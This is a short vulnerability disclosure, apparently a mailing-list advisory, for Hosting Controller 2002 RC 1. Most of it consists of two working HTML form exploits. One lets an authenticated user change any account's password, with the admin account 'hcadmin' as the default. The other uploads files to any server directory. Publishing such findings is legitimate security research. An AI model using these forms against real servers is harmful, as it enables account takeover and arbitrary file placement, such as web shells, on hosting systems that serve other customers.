-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, i've found 2 vulnerabilities in Hosting Controller that allows remote authenticated users to change every user password or upload files in every directory. Here are the PoC: This allows to modify passwords: <form action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser " method="post"> Username: <input name="UserName" value="hcadmin" type="text" size="50"> <br> Name: <input name="FullName" value="g|25|h" type="text" size="50"> <br> ChangePass (type true): <input type="checkbox" name="PassCheck" value="TRUE"> <br> Password: <input name="Pass1" title="Password"> <br> Confirm: <input name="ConfPass" title="Password"> <br> <input name="submit" value="submit" type="submit"> </form> <br> PS: You should have authenticated access.<br> <br> - -------------------------<br> Vulnerable versions:<br> - - HC 2002 RC 1<br> Other versions may be vulnerable And this allows to upload: <form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"; enctype="multipart/form-data"> Where upload files: <input name="OpenPath" value="E:\webspace\test"> <br> File 1: <input type="file" name="file1" value><br> File 2: <input type="file" name="file2" value><br> File 3: <input type="file" name="file3" value><br> File 4: <input type="file" name="file4" value><br> <input type="submit" value="Upload Files" name="upload"><br> <br><br> PS: If you see an error message, it's not important. You just should have authenticated access. </form> <br> - -------------------------<br> Vulnerable versions:<br> - - HC 2002 RC 1<br> Other versions may be vulnerable This vulns are tested with HC 2002 RC 1, but other versions may be vulnerable. Sorry for my english, but i'm Italian. -----BEGIN PGP SIGNATURE----- Version: 6.5.8ckt http://www.ipgpp.com/ iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh KUkiwb7H3FkEdfZcORRpl4LH =qlwF -----END PGP SIGNATURE-----
